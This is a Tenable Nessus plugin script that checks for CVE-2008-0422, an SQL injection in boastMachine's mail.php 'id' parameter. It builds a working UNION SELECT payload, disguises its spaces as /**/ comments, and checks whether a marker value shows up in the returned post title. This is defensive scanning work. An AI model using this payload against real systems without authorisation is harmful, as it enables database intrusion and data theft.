#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(30052);
  script_version("$Revision: 1.5 $");

  script_cve_id("CVE-2008-0422");
  script_bugtraq_id(27369);
  script_xref(name:"milw0rm", value:"4952");

  script_name(english:"boastMachine id Parameter SQL Injection Vulnerability");
  script_summary(english:"Tries to manipulate a post title using mail.php");

  desc = "
Synopsis :

The remote web server contains a PHP script that is susceptible to a
SQL injection attack. 

Description :

The remote host is running boastMachine, an open-source publishing
tool written in PHP. 

The version of boastMachine installed on the remote host fails to
sanitize user input to the 'id' parameter of the 'mail.php' script
before using it to perform database queries.  Provided PHP's
'magic_quotes_gpc' setting is disabled, an attacker may be able to
exploit this issue to manipulate database queries to disclose
sensitive information, bypass authentication, or even attack the
underlying database. 

See also :

http://www.securityfocus.com/archive/1/486737/30/0/threaded

Solution :

Unknown at this time.

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/boastmachine", "/bmachine", "/blob", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Grab index.php.
  res = http_get_cache(item:string(dir, "/index.php"), port:port);
  if (res == NULL) exit(0);

  # Identify a blog; fallback to '1' if we didn't find one.
  blog = NULL;

  pat = '<input type="hidden" name="blog" value="([0-9]+)"';
  matches = egrep(pattern:pat, string:res);
  if (matches) 
  {
    foreach match (split(matches)) 
    {
      match = chomp(match);
      item = eregmatch(pattern:pat, string:match);
      if (!isnull(item))
      {
        blog = item[1];
        break;
      }
    }
  }
  if (isnull(blog)) blog = 1;

  magic = unixtime();
  exploit = string("' UNION SELECT 1,2,", magic, ",4/*");
  exploit = str_replace(find:" ", replace:"/**/", string:exploit);

  # Try to exploit the issue to manipulate a post's title.
  req = http_get(
    item:string(
      dir, "/mail.php?",
      "id=", exploit, "&",
      "blog=", blog
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if we see our magic in the post title.
  if (string('<h1>Send the post "', magic, '" to a friend') >< res)
  {
    security_hole(port);
    exit(0);
  }
}
